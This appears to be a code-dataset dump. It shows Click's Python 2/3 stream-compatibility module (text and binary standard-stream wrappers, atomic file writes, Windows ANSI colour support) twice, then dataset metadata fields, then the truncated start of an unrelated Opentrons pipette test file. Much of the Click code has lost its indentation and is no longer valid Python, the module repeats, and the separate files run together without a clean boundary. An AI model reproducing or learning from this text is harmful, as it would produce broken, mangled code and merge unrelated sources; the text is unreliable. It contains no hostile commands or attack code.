        def writelines(self, lines):
            for line in lines:
                self.write(line)

    def __del__(self):
        # Detach on teardown so the wrapped stream outlives this wrapper.
        try:
            self.detach()
        except Exception:
            pass

    def isatty(self):
        # https://bitbucket.org/pypy/pypy/issue/1803
        return self._stream.isatty()
class _FixupStream(object):
    """The new io interface needs more from streams than streams
    traditionally implement.  As such, this fix-up code is necessary in
    some circumstances.

    The forcing of readable and writable flags are there because some tools
    put badly patched objects on sys (one such offender are certain version
    of jupyter notebook).
    """

    def __init__(self, stream, force_readable=False, force_writable=False):
        self._stream = stream
        self._force_readable = force_readable
        self._force_writable = force_writable

    def __getattr__(self, name):
        # Everything not defined here is delegated to the wrapped stream.
        return getattr(self._stream, name)

    def read1(self, size):
        # Prefer the stream's own read1() when available.
        f = getattr(self._stream, 'read1', None)
        if f is not None:
            return f(size)
        # We only dispatch to readline instead of read in Python 2 as we
        # do not want cause problems with the different implementation
        # of line buffering.
        if PY2:
            return self._stream.readline(size)
        return self._stream.read(size)

    def readable(self):
        if self._force_readable:
            return True
        x = getattr(self._stream, 'readable', None)
        if x is not None:
            return x()
        # Stream lacks readable(): probe with a zero-byte read instead.
        try:
            self._stream.read(0)
        except Exception:
            return False
        return True

    def writable(self):
        if self._force_writable:
            return True
        x = getattr(self._stream, 'writable', None)
        if x is not None:
            return x()
        # Stream lacks writable(): probe with empty text, then empty bytes.
        try:
            self._stream.write('')
        except Exception:
            try:
                self._stream.write(b'')
            except Exception:
                return False
        return True

    def seekable(self):
        x = getattr(self._stream, 'seekable', None)
        if x is not None:
            return x()
        # Stream lacks seekable(): probe by seeking to the current offset.
        try:
            self._stream.seek(self._stream.tell())
        except Exception:
            return False
        return True
if PY2:
text_type = unicode
bytes = str
raw_input = raw_input
string_types = (str, unicode)
int_types = (int, long)
iteritems = lambda x: x.iteritems()
range_type = xrange
def is_bytes(x):
return isinstance(x, (buffer, bytearray))
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
# For Windows, we need to force stdout/stdin/stderr to binary if it's
# fetched for that. This obviously is not the most correct way to do
# it as it changes global state. Unfortunately, there does not seem to
# be a clear better way to do it as just reopening the file in binary
# mode does not change anything.
#
# An option would be to do what Python 3 does and to open the file as
# binary only, patch it back to the system, and then use a wrapper
# stream that converts newlines. It's not quite clear what's the
# correct option here.
#
# This code also lives in _winconsole for the fallback to the console
# emulation stream.
#
# There are also Windows environments where the `msvcrt` module is not
# available (which is why we use try-catch instead of the WIN variable
# here), such as the Google App Engine development server on Windows. In
# those cases there is just nothing we can do.
def set_binary_mode(f):
return f
try:
import msvcrt
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
msvcrt.setmode(fileno, os.O_BINARY)
return f
try:
import fcntl
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
flags = fcntl.fcntl(fileno, fcntl.F_GETFL)
fcntl.fcntl(fileno, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
return f
def isidentifier(x):
return _identifier_re.search(x) is not None
def get_binary_stdin():
return set_binary_mode(sys.stdin)
def get_binary_stdout():
_wrap_std_stream('stdout')
return set_binary_mode(sys.stdout)
def get_binary_stderr():
_wrap_std_stream('stderr')
return set_binary_mode(sys.stderr)
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
_wrap_std_stream('stdout')
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
_wrap_std_stream('stderr')
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
return value
else:
import io
text_type = str
raw_input = input
string_types = (str,)
int_types = (int,)
range_type = range
isidentifier = lambda x: x.isidentifier()
iteritems = lambda x: iter(x.items())
def is_bytes(x):
return isinstance(x, (bytes, memoryview, bytearray))
def _is_binary_reader(stream, default=False):
try:
return isinstance(stream.read(0), bytes)
except Exception:
return default
# This happens in some cases where the stream was already
# closed. In this case, we assume the default.
def _is_binary_writer(stream, default=False):
try:
stream.write(b'')
except Exception:
try:
stream.write('')
return False
except Exception:
pass
return default
return True
def _find_binary_reader(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detaching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_reader(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_reader(buf, True):
return buf
def _find_binary_writer(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detatching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_writer(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_writer(buf, True):
return buf
def _stream_is_misconfigured(stream):
"""A stream is misconfigured if its encoding is ASCII."""
# If the stream does not have an encoding set, we assume it's set
# to ASCII. This appears to happen in certain unittest
# environments. It's not quite clear what the correct behavior is
# but this at least will force Click to recover somehow.
return is_ascii_encoding(getattr(stream, 'encoding', None) or 'ascii')
def _is_compatible_text_stream(stream, encoding, errors):
stream_encoding = getattr(stream, 'encoding', None)
stream_errors = getattr(stream, 'errors', None)
# Perfect match.
if stream_encoding == encoding and stream_errors == errors:
return True
# Otherwise, it's only a compatible stream if we did not ask for
# an encoding.
if encoding is None:
return stream_encoding is not None
return False
def _force_correct_text_reader(text_reader, encoding, errors,
force_readable=False):
if _is_binary_reader(text_reader, False):
binary_reader = text_reader
else:
# If there is no target encoding set, we need to verify that the
# reader is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_reader):
return text_reader
if _is_compatible_text_stream(text_reader, encoding, errors):
return text_reader
# If the reader has no encoding, we try to find the underlying
# binary reader for it. If that fails because the environment is
# misconfigured, we silently go with the same reader because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_reader = _find_binary_reader(text_reader)
if binary_reader is None:
return text_reader
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_reader, encoding, errors,
force_readable=force_readable)
def _force_correct_text_writer(text_writer, encoding, errors,
force_writable=False):
if _is_binary_writer(text_writer, False):
binary_writer = text_writer
else:
# If there is no target encoding set, we need to verify that the
# writer is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_writer):
return text_writer
if _is_compatible_text_stream(text_writer, encoding, errors):
return text_writer
# If the writer has no encoding, we try to find the underlying
# binary writer for it. If that fails because the environment is
# misconfigured, we silently go with the same writer because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_writer = _find_binary_writer(text_writer)
if binary_writer is None:
return text_writer
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_writer, encoding, errors,
force_writable=force_writable)
def get_binary_stdin():
reader = _find_binary_reader(sys.stdin)
if reader is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdin.')
return reader
def get_binary_stdout():
writer = _find_binary_writer(sys.stdout)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdout.')
return writer
def get_binary_stderr():
writer = _find_binary_writer(sys.stderr)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stderr.')
return writer
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_reader(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
else:
value = value.encode('utf-8', 'surrogateescape') \
.decode('utf-8', 'replace')
return value
def get_streerror(e, default=None):
if hasattr(e, 'strerror'):
msg = e.strerror
else:
if default is not None:
msg = default
else:
msg = str(e)
if isinstance(msg, bytes):
msg = msg.decode('utf-8', 'replace')
return msg
def open_stream(filename, mode='r', encoding=None, errors='strict',
atomic=False):
# Standard streams first. These are simple because they don't need
# special handling for the atomic flag. It's entirely ignored.
if filename == '-':
if any(m in mode for m in ['w', 'a', 'x']):
if 'b' in mode:
return get_binary_stdout(), False
return get_text_stdout(encoding=encoding, errors=errors), False
if 'b' in mode:
return get_binary_stdin(), False
return get_text_stdin(encoding=encoding, errors=errors), False
# Non-atomic writes directly go out through the regular open functions.
if not atomic:
if encoding is None:
return open(filename, mode), True
return io.open(filename, mode, encoding=encoding, errors=errors), True
# Some usability stuff for atomic writes
if 'a' in mode:
raise ValueError(
'Appending to an existing file is not supported, because that '
'would involve an expensive `copy`-operation to a temporary '
'file. Open the file in normal `w`-mode and copy explicitly '
'if that\'s what you\'re after.'
)
if 'x' in mode:
raise ValueError('Use the `overwrite`-parameter instead.')
if 'w' not in mode:
raise ValueError('Atomic writes only make sense with `w`-mode.')
# Atomic writes are more complicated. They work by opening a file
# as a proxy in the same folder and then using the fdopen
# functionality to wrap it in a Python file. Then we wrap it in an
# atomic file that moves the file over on close.
import tempfile
fd, tmp_filename = tempfile.mkstemp(dir=os.path.dirname(filename),
prefix='.__atomic-write')
if encoding is not None:
f = io.open(fd, mode, encoding=encoding, errors=errors)
else:
f = os.fdopen(fd, mode)
return _AtomicFile(f, tmp_filename, os.path.realpath(filename)), True
# Used in a destructor call, needs extra protection from interpreter cleanup.
if hasattr(os, 'replace'):
_replace = os.replace
_can_replace = True
else:
_replace = os.rename
_can_replace = not WIN
class _AtomicFile(object):
def __init__(self, f, tmp_filename, real_filename):
self._f = f
self._tmp_filename = tmp_filename
self._real_filename = real_filename
self.closed = False
@property
def name(self):
return self._real_filename
def close(self, delete=False):
if self.closed:
return
self._f.close()
if not _can_replace:
try:
os.remove(self._real_filename)
except OSError:
pass
_replace(self._tmp_filename, self._real_filename)
self.closed = True
def __getattr__(self, name):
return getattr(self._f, name)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close(delete=exc_type is not None)
def __repr__(self):
return repr(self._f)
auto_wrap_for_ansi = None
colorama = None
get_winterm_size = None
def strip_ansi(value):
return _ansi_re.sub('', value)
def should_strip_ansi(stream=None, color=None):
if color is None:
if stream is None:
stream = sys.stdin
return not isatty(stream)
return not color
# If we're on Windows, we provide transparent integration through
# colorama. This will make ANSI colors through the echo function
# work automatically.
if WIN:
# Windows has a smaller terminal
DEFAULT_COLUMNS = 79
from ._winconsole import _get_windows_console_stream, _wrap_std_stream
def _get_argv_encoding():
import locale
return locale.getpreferredencoding()
if PY2:
def raw_input(prompt=''):
sys.stderr.flush()
if prompt:
stdout = _default_text_stdout()
stdout.write(prompt)
stdin = _default_text_stdin()
return stdin.readline().rstrip('\r\n')
try:
import colorama
except ImportError:
pass
else:
_ansi_stream_wrappers = WeakKeyDictionary()
def auto_wrap_for_ansi(stream, color=None):
"""This function wraps a stream so that calls through colorama
are issued to the win32 console API to recolor on demand. It
also ensures to reset the colors if a write call is interrupted
to not destroy the console afterwards.
"""
try:
cached = _ansi_stream_wrappers.get(stream)
except Exception:
cached = None
if cached is not None:
return cached
strip = should_strip_ansi(stream, color)
ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip)
rv = ansi_wrapper.stream
_write = rv.write
def _safe_write(s):
try:
return _write(s)
except Exception:
ansi_wrapper.reset_all()
raise
rv.write = _safe_write
try:
_ansi_stream_wrappers[stream] = rv
except Exception:
pass
return rv
def get_winterm_size():
win = colorama.win32.GetConsoleScreenBufferInfo(
colorama.win32.STDOUT).srWindow
return win.Right - win.Left, win.Bottom - win.Top
else:
def _get_argv_encoding():
return getattr(sys.stdin, 'encoding', None) or get_filesystem_encoding()
_get_windows_console_stream = lambda *x: None
_wrap_std_stream = lambda *x: None
def term_len(x):
return len(strip_ansi(x))
def isatty(stream):
try:
return stream.isatty()
except Exception:
return False
def _make_cached_stream_func(src_func, wrapper_func):
cache = WeakKeyDictionary()
def func():
stream = src_func()
try:
rv = cache.get(stream)
except Exception:
rv = None
if rv is not None:
return rv
rv = wrapper_func()
try:
stream = src_func() # In case wrapper_func() modified the stream
cache[stream] = rv
except Exception:
pass
return rv
return func
_default_text_stdin = _make_cached_stream_func(
lambda: sys.stdin, get_text_stdin)
_default_text_stdout = _make_cached_stream_func(
lambda: sys.stdout, get_text_stdout)
_default_text_stderr = _make_cached_stream_func(
lambda: sys.stderr, get_text_stderr)
binary_streams = {
'stdin': get_binary_stdin,
'stdout': get_binary_stdout,
'stderr': get_binary_stderr,
}
text_streams = {
'stdin': get_text_stdin,
'stdout': get_text_stdout,
'stderr': get_text_stderr,
}
| 33.25142 | 80 | 0.610065 | import re
import io
import os
import sys
import codecs
from weakref import WeakKeyDictionary
PY2 = sys.version_info[0] == 2
CYGWIN = sys.platform.startswith('cygwin')
APP_ENGINE = ('APPENGINE_RUNTIME' in os.environ and
'Development/' in os.environ['SERVER_SOFTWARE'])
WIN = sys.platform.startswith('win') and not APP_ENGINE
DEFAULT_COLUMNS = 80
_ansi_re = re.compile(r'\033\[((?:\d|;)*)([a-zA-Z])')
def get_filesystem_encoding():
return sys.getfilesystemencoding() or sys.getdefaultencoding()
def _make_text_stream(stream, encoding, errors,
force_readable=False, force_writable=False):
if encoding is None:
encoding = get_best_encoding(stream)
if errors is None:
errors = 'replace'
return _NonClosingTextIOWrapper(stream, encoding, errors,
line_buffering=True,
force_readable=force_readable,
force_writable=force_writable)
def is_ascii_encoding(encoding):
try:
return codecs.lookup(encoding).name == 'ascii'
except LookupError:
return False
def get_best_encoding(stream):
rv = getattr(stream, 'encoding', None) or sys.getdefaultencoding()
if is_ascii_encoding(rv):
return 'utf-8'
return rv
class _NonClosingTextIOWrapper(io.TextIOWrapper):
def __init__(self, stream, encoding, errors,
force_readable=False, force_writable=False, **extra):
self._stream = stream = _FixupStream(stream, force_readable,
force_writable)
io.TextIOWrapper.__init__(self, stream, encoding, errors, **extra)
# The io module is a place where the Python 3 text behavior
# was forced upon Python 2, so we need to unbreak
# it to look like Python 2.
if PY2:
def write(self, x):
if isinstance(x, str) or is_bytes(x):
try:
self.flush()
except Exception:
pass
return self.buffer.write(str(x))
return io.TextIOWrapper.write(self, x)
def writelines(self, lines):
for line in lines:
self.write(line)
def __del__(self):
try:
self.detach()
except Exception:
pass
def isatty(self):
# https://bitbucket.org/pypy/pypy/issue/1803
return self._stream.isatty()
class _FixupStream(object):
def __init__(self, stream, force_readable=False, force_writable=False):
self._stream = stream
self._force_readable = force_readable
self._force_writable = force_writable
def __getattr__(self, name):
return getattr(self._stream, name)
def read1(self, size):
f = getattr(self._stream, 'read1', None)
if f is not None:
return f(size)
# We only dispatch to readline instead of read in Python 2 as we
# do not want cause problems with the different implementation
# of line buffering.
if PY2:
return self._stream.readline(size)
return self._stream.read(size)
def readable(self):
if self._force_readable:
return True
x = getattr(self._stream, 'readable', None)
if x is not None:
return x()
try:
self._stream.read(0)
except Exception:
return False
return True
def writable(self):
if self._force_writable:
return True
x = getattr(self._stream, 'writable', None)
if x is not None:
return x()
try:
self._stream.write('')
except Exception:
try:
self._stream.write(b'')
except Exception:
return False
return True
def seekable(self):
x = getattr(self._stream, 'seekable', None)
if x is not None:
return x()
try:
self._stream.seek(self._stream.tell())
except Exception:
return False
return True
if PY2:
text_type = unicode
bytes = str
raw_input = raw_input
string_types = (str, unicode)
int_types = (int, long)
iteritems = lambda x: x.iteritems()
range_type = xrange
def is_bytes(x):
return isinstance(x, (buffer, bytearray))
_identifier_re = re.compile(r'^[a-zA-Z_][a-zA-Z0-9_]*$')
# For Windows, we need to force stdout/stdin/stderr to binary if it's
def set_binary_mode(f):
return f
try:
import msvcrt
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
msvcrt.setmode(fileno, os.O_BINARY)
return f
try:
import fcntl
except ImportError:
pass
else:
def set_binary_mode(f):
try:
fileno = f.fileno()
except Exception:
pass
else:
flags = fcntl.fcntl(fileno, fcntl.F_GETFL)
fcntl.fcntl(fileno, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
return f
def isidentifier(x):
return _identifier_re.search(x) is not None
def get_binary_stdin():
return set_binary_mode(sys.stdin)
def get_binary_stdout():
_wrap_std_stream('stdout')
return set_binary_mode(sys.stdout)
def get_binary_stderr():
_wrap_std_stream('stderr')
return set_binary_mode(sys.stderr)
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
_wrap_std_stream('stdout')
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
_wrap_std_stream('stderr')
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _make_text_stream(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
return value
else:
import io
text_type = str
raw_input = input
string_types = (str,)
int_types = (int,)
range_type = range
isidentifier = lambda x: x.isidentifier()
iteritems = lambda x: iter(x.items())
def is_bytes(x):
return isinstance(x, (bytes, memoryview, bytearray))
def _is_binary_reader(stream, default=False):
try:
return isinstance(stream.read(0), bytes)
except Exception:
return default
def _is_binary_writer(stream, default=False):
try:
stream.write(b'')
except Exception:
try:
stream.write('')
return False
except Exception:
pass
return default
return True
def _find_binary_reader(stream):
if _is_binary_reader(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
if buf is not None and _is_binary_reader(buf, True):
return buf
def _find_binary_writer(stream):
# We need to figure out if the given stream is already binary.
# This can happen because the official docs recommend detatching
# the streams to get binary streams. Some code might do this, so
# we need to deal with this case explicitly.
if _is_binary_writer(stream, False):
return stream
buf = getattr(stream, 'buffer', None)
# Same situation here; this time we assume that the buffer is
# actually binary in case it's closed.
if buf is not None and _is_binary_writer(buf, True):
return buf
def _stream_is_misconfigured(stream):
"""A stream is misconfigured if its encoding is ASCII."""
# to ASCII. This appears to happen in certain unittest
# environments. It's not quite clear what the correct behavior is
return is_ascii_encoding(getattr(stream, 'encoding', None) or 'ascii')
def _is_compatible_text_stream(stream, encoding, errors):
stream_encoding = getattr(stream, 'encoding', None)
stream_errors = getattr(stream, 'errors', None)
if stream_encoding == encoding and stream_errors == errors:
return True
# an encoding.
if encoding is None:
return stream_encoding is not None
return False
def _force_correct_text_reader(text_reader, encoding, errors,
force_readable=False):
if _is_binary_reader(text_reader, False):
binary_reader = text_reader
else:
# If there is no target encoding set, we need to verify that the
# reader is not actually misconfigured.
if encoding is None and not _stream_is_misconfigured(text_reader):
return text_reader
if _is_compatible_text_stream(text_reader, encoding, errors):
return text_reader
# If the reader has no encoding, we try to find the underlying
# binary reader for it. If that fails because the environment is
# misconfigured, we silently go with the same reader because this
# is too common to happen. In that case, mojibake is better than
# exceptions.
binary_reader = _find_binary_reader(text_reader)
if binary_reader is None:
return text_reader
# At this point, we default the errors to replace instead of strict
# because nobody handles those errors anyways and at this point
# we're so fundamentally fucked that nothing can repair it.
if errors is None:
errors = 'replace'
return _make_text_stream(binary_reader, encoding, errors,
force_readable=force_readable)
def _force_correct_text_writer(text_writer, encoding, errors,
force_writable=False):
if _is_binary_writer(text_writer, False):
binary_writer = text_writer
else:
if encoding is None and not _stream_is_misconfigured(text_writer):
return text_writer
if _is_compatible_text_stream(text_writer, encoding, errors):
return text_writer
binary_writer = _find_binary_writer(text_writer)
if binary_writer is None:
return text_writer
if errors is None:
errors = 'replace'
return _make_text_stream(binary_writer, encoding, errors,
force_writable=force_writable)
def get_binary_stdin():
reader = _find_binary_reader(sys.stdin)
if reader is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdin.')
return reader
def get_binary_stdout():
writer = _find_binary_writer(sys.stdout)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stdout.')
return writer
def get_binary_stderr():
writer = _find_binary_writer(sys.stderr)
if writer is None:
raise RuntimeError('Was not able to determine binary '
'stream for sys.stderr.')
return writer
def get_text_stdin(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdin, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_reader(sys.stdin, encoding, errors,
force_readable=True)
def get_text_stdout(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stdout, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stdout, encoding, errors,
force_writable=True)
def get_text_stderr(encoding=None, errors=None):
rv = _get_windows_console_stream(sys.stderr, encoding, errors)
if rv is not None:
return rv
return _force_correct_text_writer(sys.stderr, encoding, errors,
force_writable=True)
def filename_to_ui(value):
if isinstance(value, bytes):
value = value.decode(get_filesystem_encoding(), 'replace')
else:
value = value.encode('utf-8', 'surrogateescape') \
.decode('utf-8', 'replace')
return value
def get_streerror(e, default=None):
if hasattr(e, 'strerror'):
msg = e.strerror
else:
if default is not None:
msg = default
else:
msg = str(e)
if isinstance(msg, bytes):
msg = msg.decode('utf-8', 'replace')
return msg
def open_stream(filename, mode='r', encoding=None, errors='strict',
atomic=False):
# Standard streams first. These are simple because they don't need
if filename == '-':
if any(m in mode for m in ['w', 'a', 'x']):
if 'b' in mode:
return get_binary_stdout(), False
return get_text_stdout(encoding=encoding, errors=errors), False
if 'b' in mode:
return get_binary_stdin(), False
return get_text_stdin(encoding=encoding, errors=errors), False
# Non-atomic writes directly go out through the regular open functions.
if not atomic:
if encoding is None:
return open(filename, mode), True
return io.open(filename, mode, encoding=encoding, errors=errors), True
# Some usability stuff for atomic writes
if 'a' in mode:
raise ValueError(
'Appending to an existing file is not supported, because that '
'would involve an expensive `copy`-operation to a temporary '
'file. Open the file in normal `w`-mode and copy explicitly '
'if that\'s what you\'re after.'
)
if 'x' in mode:
raise ValueError('Use the `overwrite`-parameter instead.')
if 'w' not in mode:
raise ValueError('Atomic writes only make sense with `w`-mode.')
# Atomic writes are more complicated. They work by opening a file
# as a proxy in the same folder and then using the fdopen
# functionality to wrap it in a Python file. Then we wrap it in an
# atomic file that moves the file over on close.
import tempfile
fd, tmp_filename = tempfile.mkstemp(dir=os.path.dirname(filename),
prefix='.__atomic-write')
if encoding is not None:
f = io.open(fd, mode, encoding=encoding, errors=errors)
else:
f = os.fdopen(fd, mode)
return _AtomicFile(f, tmp_filename, os.path.realpath(filename)), True
# Used in a destructor call, needs extra protection from interpreter cleanup.
if hasattr(os, 'replace'):
_replace = os.replace
_can_replace = True
else:
_replace = os.rename
_can_replace = not WIN
class _AtomicFile(object):
def __init__(self, f, tmp_filename, real_filename):
self._f = f
self._tmp_filename = tmp_filename
self._real_filename = real_filename
self.closed = False
@property
def name(self):
return self._real_filename
def close(self, delete=False):
if self.closed:
return
self._f.close()
if not _can_replace:
try:
os.remove(self._real_filename)
except OSError:
pass
_replace(self._tmp_filename, self._real_filename)
self.closed = True
def __getattr__(self, name):
return getattr(self._f, name)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close(delete=exc_type is not None)
def __repr__(self):
return repr(self._f)
auto_wrap_for_ansi = None
colorama = None
get_winterm_size = None
def strip_ansi(value):
return _ansi_re.sub('', value)
def should_strip_ansi(stream=None, color=None):
if color is None:
if stream is None:
stream = sys.stdin
return not isatty(stream)
return not color
# If we're on Windows, we provide transparent integration through
if WIN:
DEFAULT_COLUMNS = 79
from ._winconsole import _get_windows_console_stream, _wrap_std_stream
def _get_argv_encoding():
import locale
return locale.getpreferredencoding()
if PY2:
def raw_input(prompt=''):
sys.stderr.flush()
if prompt:
stdout = _default_text_stdout()
stdout.write(prompt)
stdin = _default_text_stdin()
return stdin.readline().rstrip('\r\n')
try:
import colorama
except ImportError:
pass
else:
_ansi_stream_wrappers = WeakKeyDictionary()
def auto_wrap_for_ansi(stream, color=None):
"""This function wraps a stream so that calls through colorama
are issued to the win32 console API to recolor on demand. It
also ensures to reset the colors if a write call is interrupted
to not destroy the console afterwards.
"""
try:
cached = _ansi_stream_wrappers.get(stream)
except Exception:
cached = None
if cached is not None:
return cached
strip = should_strip_ansi(stream, color)
ansi_wrapper = colorama.AnsiToWin32(stream, strip=strip)
rv = ansi_wrapper.stream
_write = rv.write
def _safe_write(s):
try:
return _write(s)
except Exception:
ansi_wrapper.reset_all()
raise
rv.write = _safe_write
try:
_ansi_stream_wrappers[stream] = rv
except Exception:
pass
return rv
def get_winterm_size():
win = colorama.win32.GetConsoleScreenBufferInfo(
colorama.win32.STDOUT).srWindow
return win.Right - win.Left, win.Bottom - win.Top
else:
def _get_argv_encoding():
return getattr(sys.stdin, 'encoding', None) or get_filesystem_encoding()
_get_windows_console_stream = lambda *x: None
_wrap_std_stream = lambda *x: None
def term_len(x):
return len(strip_ansi(x))
def isatty(stream):
try:
return stream.isatty()
except Exception:
return False
def _make_cached_stream_func(src_func, wrapper_func):
cache = WeakKeyDictionary()
def func():
stream = src_func()
try:
rv = cache.get(stream)
except Exception:
rv = None
if rv is not None:
return rv
rv = wrapper_func()
try:
stream = src_func()
cache[stream] = rv
except Exception:
pass
return rv
return func
_default_text_stdin = _make_cached_stream_func(
lambda: sys.stdin, get_text_stdin)
_default_text_stdout = _make_cached_stream_func(
lambda: sys.stdout, get_text_stdout)
_default_text_stderr = _make_cached_stream_func(
lambda: sys.stderr, get_text_stderr)
binary_streams = {
'stdin': get_binary_stdin,
'stdout': get_binary_stdout,
'stderr': get_binary_stderr,
}
text_streams = {
'stdin': get_text_stdin,
'stdout': get_text_stdout,
'stderr': get_text_stderr,
}
| true | true |
1c3ca4830af7c2131448f1698e9701a6a38724d0 | 5,913 | py | Python | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | [
"Apache-2.0"
] | 2 | 2015-11-10T17:49:51.000Z | 2016-01-15T04:43:37.000Z | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/labware | e21d8db51eac5818477264a45ef12c0a2d15fb72 | [
"Apache-2.0"
] | null | null | null | api/tests/opentrons/protocols/context/simulator/test_instrument_context.py | Opentrons/labware | e21d8db51eac5818477264a45ef12c0a2d15fb72 | [
"Apache-2.0"
] | null | null | null | """Test instrument context simulation."""
from typing import Callable
import pytest
from pytest_lazyfixture import lazy_fixture
from opentrons.hardware_control import NoTipAttachedError
from opentrons.hardware_control.types import TipAttachedError
from opentrons.protocols.context.labware import AbstractLabware
from opentrons.protocols.context.instrument import AbstractInstrument
@pytest.fixture(
params=[
lazy_fixture("instrument_context"),
lazy_fixture("simulating_instrument_context"),
]
)
def subject(request) -> AbstractInstrument:
return request.param
def test_same_pipette(
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
"""It should have the same pipette as hardware backed instrument context."""
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def test_aspirate_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform ASPIRATE"):
subject.aspirate(volume=1, rate=1)
def test_prepare_to_aspirate_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform PREPARE_ASPIRATE"):
subject.prepare_for_aspirate()
def test_dispense_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform DISPENSE"):
subject.dispense(volume=1, rate=1)
def test_drop_tip_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform DROPTIP"):
subject.drop_tip(home_after=False)
def test_blow_out_no_tip(subject: AbstractInstrument) -> None:
"""It should raise an error if a tip is not attached."""
with pytest.raises(NoTipAttachedError, match="Cannot perform BLOWOUT"):
subject.blow_out()
def test_pick_up_tip_no_tip(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
"""It should raise an error if a tip is already attached."""
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
with pytest.raises(TipAttachedError):
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
def test_aspirate_too_much(
subject: AbstractInstrument, labware: AbstractLabware
) -> None:
"""It should raise an error if try to aspirate more than possible."""
subject.home()
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
subject.prepare_for_aspirate()
with pytest.raises(
AssertionError, match="Cannot aspirate more than pipette max volume"
):
subject.aspirate(subject.get_max_volume() + 1, rate=1)
def test_working_volume(subject: AbstractInstrument, labware: AbstractLabware) -> None:
"""It should have the correct working volume."""
subject.home()
